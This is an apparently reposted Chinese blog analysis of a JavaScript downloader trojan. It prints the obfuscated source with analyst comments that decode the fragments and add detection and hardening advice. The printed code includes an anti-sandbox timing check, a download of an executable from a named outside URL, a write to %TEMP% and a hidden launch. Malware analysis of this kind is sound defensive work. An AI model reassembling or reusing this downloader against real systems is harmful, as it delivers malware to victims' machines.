//经过样本分析和抓取,该恶意程序是一款下载者木马。

//不懂的可以百度百科。

http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK

// ---- Decoy fragment table ----------------------------------------------
// Analyst note: the sixty short string variables below are never referenced
// by the statements at the end of this listing. Read bottom-up, each group
// of twenty spells the filler string the original analyst decoded in the
// trailing comments ("asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf"), which also
// reappears as a literal in the dead stores at the very end. The block is
// padding meant to inflate and obscure the script, not part of the payload.
// The listing is kept verbatim for analysis; it is not runnable as pasted.
var uKcZJmztw = "f";
var VLjBZijBRDIxir = "sd";
var mzHiDfbVgtzWL = "uhi";
var XrxesgIWQ = "ya";
var STgtocEaUgS = "f";
var Mccq = "gsd";
var YVFRNFKC = "a7o";
var zokYxgifSUOsDIn = "d8f";
var rysGOQRkJ = "hgs";
var fAJEpxv = "7";
var LzK = "u";
var WnKggbYjhbgaYK = "dfa";
var RQJm = "s";
var tcbpCSVm = "o";
var glYioNGTMO = "a";
var cMleB = "fkj";
var guMAPaymgfr = ";l";
var aWosZJAl = "d";
var rrruwakBVMdHT = "s";
var QcfK = "a"; //asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf//---------------------------------
var wxGM = "f";
var wME = "sd";
var WYl = "hi";
var DgXr = "yau";
var OFbjPAVgdUDSr = "sdf";
var AKaUjBxV = "g";
var YWyNEBKTCAr = "a7o";
var UmkNXPoXKvV = "8f";
var jrUTHQOJCXz = "d";
var VMrAuxWTPKwLZbj = "hgs";
var hnAKwB = "au7";
var kuRwVoQ = "f";
var OXjw = "d";
var wSaGYFaTjPu = "aos";
var UdT = "j";
var wGKytuRmi = "k";
var FwSAu = ";lf";
var uSsmxvh = "d";
var xrUulSuJwZcZEin = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf
// (separator below lost its comment marker when the post was pasted; compare
// the same separator on the first group)
//---------------------------------
var fvJysePITGsZ = "f";
var MJLm = "sd";
var OHdTWUSWyLDnD = "hi";
var NfkoHHanka = "au";
var pAJLp = "fy";
var xTeQe = "d";
var wolngRcKPNjI = "s";
var Ctd0 = "og";
var NGJpEc = "a7";
var johMrZhTBT = "f";
var rWRr = "d8";
var xhuyvlXNtG = "gs";
var AoFEsd = "7h";
var IarTKEg = "fau";
var UiCusNVVRYpV = "osd";
var SqXtHDCTAOoEfv = "ja";
var kSXJa = "k";
var AzMZQADlr = ";lf";
var OFZC = "sd";
var UFs = "a";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf
// ---- API-name fragment table --------------------------------------------
// Analyst note: from here on each group of fragments is concatenated at the
// call sites at the end of the listing into a COM ProgID, method or property
// name (CreateObject, WScript.Shell, Run, MSXML2.XMLHTTP, ADODB.Stream,
// ExpandEnvironmentStrings, open, type, write, position, SaveToFile, close),
// the download URL, the %TEMP% path and the dropped file name. The original
// analyst's decoded value follows each group in a trailing comment; two
// corrections from re-joining the fragments are noted inline. Splitting API
// names into one- to three-character pieces like this is done to defeat
// static string scanning — the pattern itself is a useful detection signal
// for script-based downloaders.
//-----------------------------------
var wiM = "ose";
var cdzFN = "l";
var gtVOEyZRPMBkY = "c";//close();
//-----------------------------------
var FKqYCuGSVDKEk = "e";
var yLdfoNQSLG = "Fil";
var Kegv = "o";
var REweUeFfsfzCC = "veT";
var mCxYdwKmDTeZ = "Sa";//savetofile();
//-----------------------------------
var orFCagIxftilPY = "on";
var AnB = "iti";
var OeuDh = "pos";//position
//-----------------------------------
var bxwfUYaplk = "e";
var ZHBIenDJhvi = "t";
var OmwNrBIs = "wri";//write()
//-----------------------------------
var IonAXHdnbsJsHYL = "e";
var svvPS = "typ";//type
//-----------------------------------
// This "open" spelling (RxDykD/ftsB) is not referenced by the calls below;
// the one actually used is the HrNtkpOuBMYa/KRPXN pair further down.
var RxDykD = "n";
var ftsB = "ope";//open
//-----------------------------------
var zZoO = "am";
var TSCSrKWiKQY = "tre";
var AIfn = "B.S";
var zbAsfUmIk = "D";
var uWdDgxvOZcUG = "O";
var MUSaOvH = "D";
var YZVOwlzLPfausz = "A";//"adodb.stream"
//-----------------------------------
// Second "CreateObject" spelling (pNGkr..derqHNng); also unreferenced below —
// the calls use the KnALPhmOVixZ group at the end of this table.
var pNGkr = "ct";
var iqPSquxJgp = "je";
var bTJnufjW = "b";
var lIexL = "teO";
var kZBJ = "rea";
// Paste artefact: the trailing `var` on the next line (last piece of the URL
// path) was fused into the comment when the post was pasted; the same
// happened on the msxml2 separator further down.
var derqHNng = "C";//creatobject("adodb.stream") var LiTxpjAMHxAgUQ = "4h4";
var WWzPWldMX = "6n";
var CuF0 = "k6j";
// Note: this fragment is the digit zero, so the joined path begins
// "/0k6j6n4h4", not "/ok6j6n4h4" as the decoded comment below reads —
// record the indicator with the zero.
var oUHbKSEqhF = "0";
var lQP = "hu/";
var RQUOidonsf = "l.";
var NjKvurbzu = "ta";
var CSyCCMfj = "por";
var XcTxpkvH = "egy";
var aUucLqfydBnSn = "j";
var lTXzk = "ev";
var mpAARoVfxvEsej = ".n";
var NVJeSNhziHjX = "www";
var JFDhyk = "://";
var CFpmRSiBsMp = "p";
var rKP = "htt";//http://www.nevjegyportal.hu/ok6j6n4h4
//-----------------------------------
var uBtUfBIHbmz = "T";
var LwKK = "GE";// get
//-----------------------------------
var KRPXN = "pen";
var HrNtkpOuBMYa = "o";//open
//-----------------------------------
var OFdMpJOyw = "e";
var NlpqQU = "x";
var cZpOdxEyvqRfb = "7.e";
var cLfbaiuobq = "PO";
var XmXyEnhbtWhG = "M1";
// Note: lower-case "ko" here — the joined name is KySEkoM1PO7.exe; the
// decoded comment below capitalises the k (Windows matches either spelling).
var DQZEGAm = "ko";
var cKoUGmrGJtE = "SE";
var QasyJ = "Ky";//KySEKoM1PO7.exe
//-----------------------------------
var eQyCEVqQUazI = "%/";
var tNgKCALxxEpJMf = "P";
var mNYqbv = "M";
var FrwlCZOPjcmJvoE = "E";
var KyNfXZkSc = "%T";//%TEMP%/
//-----------------------------------
var AjbjrFWcHO = "gs";
var RyW = "in";
var LVlachWJa = "Str";
var NGjUy = "t";
var ZXMail = "n";
var XLaaPawDhGaz = "e";
var lRTf = "m";
var EGxwfaNKp = "ron";
var UCOpd = "vi";
var xZQvOWiNMG = "n";
var NLgbSPQIDLAIj = "ndE";
var Gyo = "xpa";
var gPYeoLnn = "E";//expendenvironmentstrings
// Paste artefact: the "TP" fragment declaration sits inside the separator
// comment on the next line (it is referenced by the ProgID join below).
//-----------------------------------var kpsxpufDRzihIGv = "TP";
var vGOfgZZdOVh = "T";
var wJOAaSUgz = "LH";
var bPhWMdYs = "XM";
var AwpqZN = "2.";
var RNVidTrApbBfHO = "XML";
var ynXoQhqDiQydxVe = "MS";//msxml2.xmlhttp
//-----------------------------------
var zkeMzwunlwoMdUD = "n";
var oVQABSTeJWqKG = "Ru";
var WkRVEzGFpaMCAC = "ell";
var AoJg = "h";
var HDveUfs = "S";
var PGItzPyn = ".";
var iTVqHxcrEbduDt = "t";
var wxGWFQyhW = "rip";
var KDSFP = "c";
var nzV = "WS";//wscript.shell.run()
//-----------------------------------
var NFFhujLOFwsUs = "ct";
var kvZBOvoVgLSEG = "je";
var DXP = "b";
var zjRmzjunjFUys = "O";
var EcDMPFvaxG = "e";
var stMA = "at";
var KnALPhmOVixZ = "Cre";//createobject()
// ---- Execution ----------------------------------------------------------
// Analyst note (behaviour as decoded from the joins in this section):
//  1. Three WScript.Sleep(10) calls bracketed by getMilliseconds() reads;
//     the three deltas are compared and the download runs only if they are
//     NOT all equal. Presumably an emulator check — a sandbox whose clock or
//     Sleep is faked so every delta comes out identical never reaches the
//     payload. Note Sleep(10) is 10 ms, not "10s" as the inline comments say.
//  2. WScript.CreateObject("WScript.Shell"); ExpandEnvironmentStrings("%TEMP%/")
//     + "KySEkoM1PO7.exe" becomes the drop path.
//  3. MSXML2.XMLHTTP GET of the URL decoded above, synchronous (async flag
//     false), then polled on readyState < 4 with 1 s sleeps; the response
//     body is written through ADODB.Stream (Type 1 = binary; SaveToFile mode
//     2 = create/overwrite) to the drop path.
//  4. A wrapper around WScript.Shell.Run(path, 0, 0) — window style 0
//     (hidden), no wait — is defined in the comment-fused line below. Whether
//     the call to it survived the paste cannot be told from this listing.
// Defender notes: the observable chain is wscript.exe -> outbound HTTP ->
// new .exe written to %TEMP% -> child process started from %TEMP% with a
// hidden window. A script host instantiating MSXML2.XMLHTTP together with
// ADODB.Stream is a classic downloader pattern worth alerting on. Restricting
// Windows Script Host for untrusted .js attachments and blocking execution
// from %TEMP% would break this chain at two independent points; analysis
// sandboxes should let Sleep and the wall clock advance realistically or
// the first check above stops the sample before it does anything.
// Paste artefacts: several statements in this section were fused into the
// preceding `//` comment (the first `var aCTc`, both helper functions, the
// `if`, and the XMLHTTP/ADODB calls), so the text is not runnable as shown
// and is left verbatim.
//-----------------------------------var aCTc = new Date();
var SZT0 = aCTc.getMilliseconds();
WScript.Sleep(10);var aCTc = new Date();
var bRDtyPAQicD = aCTc.getMilliseconds();
WScript.Sleep(10);var aCTc = new Date();
var VrU = aCTc.getMilliseconds();
WScript.Sleep(10);var aCTc = new Date();
var DEyWdL = aCTc.getMilliseconds();//
// Three inter-sleep deltas; the gate below fires when they are not all equal.
var NdNAj = bRDtyPAQicD - SZT0;
//var NdNAj=new Date().getMilliseconds()-new Date().getMilliseconds();
//
//    10s
var HRORMjJ = VrU - bRDtyPAQicD;//    10s
// The `WshShell = WScript[CreateObject]("WScript.Shell")` statement is fused
// into the trailing comment of the next line.
var YSc0 = DEyWdL - VrU;//    10sWshShell = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](nzV + KDSFP + wxGWFQyhW + iTVqHxcrEbduDt + PGItzPyn + HDveUfs + AoJg + WkRVEzGFpaMCAC);
// Helper 1 (fused into the comment): Run(path, 0, 0) — hidden window, no wait.
//wshShell=wscript[createobject](wscript.shell.run);function jmljvNFWjSplH(NLN){WshShell[oVQABSTeJWqKG + zkeMzwunlwoMdUD](NLN, 0, 0);}//function jmljvNFWjSplH(NLN)
//{
//    WshShell[run](NLN,0,0);
// Helper 2 (fused into the comment): returns the joined ProgID "MSXML2.XMLHTTP";
// its argument is unused.
//}function OcEOsFHpWS(n){return ynXoQhqDiQydxVe + RNVidTrApbBfHO + AwpqZN + bPhWMdYs + wJOAaSUgz + vGOfgZZdOVh + kpsxpufDRzihIGv;}//function OcEOsFHpWS(n)
//{
//    return MSxml2.xmlhttp;
// Timing gate + drop-path construction: ExpandEnvironmentStrings("%TEMP%/")
// followed by the file name fragments (joined value noted in the table above).
//}if ((NdNAj != HRORMjJ) || (HRORMjJ != YSc0)){fOikDMmzwkAuGlw = WshShell[gPYeoLnn + Gyo + NLgbSPQIDLAIj + xZQvOWiNMG + UCOpd + EGxwfaNKp + lRTf + XLaaPawDhGaz + ZXMail + NGjUy + LVlachWJa + RyW + AjbjrFWcHO](KyNfXZkSc + FrwlCZOPjcmJvoE + mNYqbv + tNgKCALxxEpJMf + eQyCEVqQUazI) + QasyJ + cKoUGmrGJtE + DQZEGAm + XmXyEnhbtWhG + cLfbaiuobq + cZpOdxEyvqRfb + NlpqQU + OFdMpJOyw;//fOikDMmzwkAuGlw=/%temp%/ path
//WshShell[expendedenvironmentstrings](%temp%);EFASPqJ = OcEOsFHpWS(0);//var xmlHTTP=new ActiveObject("Microsoft.XMLHTTP");wMRqfsrlJdPwT = WScript.CreateObject(EFASPqJ);
//
// Download and write-out (all fused into one comment line): open("GET", url,
// false) / send() / readyState poll / ADODB.Stream open, Type=1, Write(ResponseBody),
// Position=0, SaveToFile(path, 2), Close(). Network and file-write telemetry
// from wscript.exe is the place to catch this stage.
//xmlhttp object//[HrNtkpOuBMYa + KRPXN]==open        wMRqfsrlJdPwT[HrNtkpOuBMYa + KRPXN](LwKK + uBtUfBIHbmz, rKP + CFpmRSiBsMp + JFDhyk + NVJeSNhziHjX + mpAARoVfxvEsej + lTXzk + aUucLqfydBnSn + XcTxpkvH + CSyCCMfj + NjKvurbzu + RQUOidonsf + lQP + oUHbKSEqhF + CuF0 + WWzPWldMX + LiTxpjAMHxAgUQ, false);//wMRqfsrlJdPwT(get,http://www.nevjegyportal.hu/ok6j6n4h4,false);//xmlhttp.open("get","url",false);wMRqfsrlJdPwT.send();while (wMRqfsrlJdPwT.readystate < 4 ) {WScript.Sleep(1000)};//readystateelcHu = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](YZVOwlzLPfausz + MUSaOvH + uWdDgxvOZcUG + zbAsfUmIk + AIfn + TSCSrKWiKQY + zZoO);//var adoStream=createobject("adodb.stream");elcHu[HrNtkpOuBMYa + KRPXN]();//adoStream.open();elcHu[svvPS + IonAXHdnbsJsHYL] = 1;//adoStream.type=1;elcHu[OmwNrBIs + ZHBIenDJhvi + bxwfUYaplk](wMRqfsrlJdPwT.ResponseBody);//adoStream.write(wMRqfsrlJdPwT.ResponseBody);elcHu[OeuDh + AnB + orFCagIxftilPY] = 0;//adoStream.position=0;elcHu[mCxYdwKmDTeZ + REweUeFfsfzCC + Kegv + yLdfoNQSLG + FKqYCuGSVDKEk](fOikDMmzwkAuGlw, 2 );//adoStream.savetofile(/%temp%/,2);elcHu[gtVOEyZRPMBkY + cdzFN + wiM]();//adoStream.close();
// Launch (as the analyst reconstructed it) followed by three dead stores that
// overwrite the timing deltas with the filler string plus timestamps — more
// padding, with no effect on behaviour.
//jmljvNFWjSplH("/%temp%/");//WshShell[run](NLN,0,0)NdNAj = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();;//10sHRORMjJ = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + VrU + bRDtyPAQicD;//new Date().getMilliseconds() - new Date().getMilliseconds()="asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();//10sYSc0 = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + DEyWdL + VrU;//10s}

转载于:https://www.cnblogs.com/microzone/p/5445511.html
